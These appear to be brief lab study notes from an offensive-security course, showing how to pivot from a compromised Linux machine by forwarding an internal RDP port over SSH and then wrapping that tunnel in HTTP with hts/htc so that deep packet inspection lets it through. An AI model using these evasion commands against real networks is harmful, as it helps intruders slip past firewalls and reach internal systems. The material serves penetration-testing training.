Http tunneling through deep packet inspection
Senario: only a specific protocal is allowed. E.g. ssh protocal is not allowed. and theres a deep packet inspection in the firewall that only allow http packet. An unused port 1234 is open by misconfiguration (unusal in real case)
port 3389 remote desktop prot
On compromised linux machine:
1 | ssh -L 0.0.0.0:8888:w.x.y.z:3389 student@127.0.0.1 |
it is not restricted since they both in the internal subnet
encapsulate the tunnel within http package
1 | sudo apt install httptunnel |
http tunnel is server-client based, on compromised linux:
1 | student@debian:~$ hts --forward-port localhost:8888 1234 |
on kali:
1 | kali@kali:~$ htc --forward-port 8080 10.11.0.128:1234 |